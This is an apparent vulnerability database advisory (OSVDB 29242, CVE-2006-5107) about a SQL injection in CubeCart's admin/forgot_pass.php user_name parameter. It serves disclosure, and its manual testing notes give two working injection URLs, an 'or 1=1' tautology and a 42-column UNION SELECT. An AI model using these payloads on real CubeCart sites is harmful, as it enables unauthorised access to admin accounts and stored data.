CubeCart admin/forgot_pass.php user_name Variable SQL Injection

2006-09-25T13:49:00
ID OSVDB:29242
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-25T13:49:00

Description

Manual Testing Notes

/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*

/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

References:

Secunia Advisory ID:22175 Related OSVDB ID: 29243 Related OSVDB ID: 29245 Related OSVDB ID: 29317 Related OSVDB ID: 29244 Related OSVDB ID: 29246 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0422.html ISS X-Force ID: 29176 CVE-2006-5107 Bugtraq ID: 20215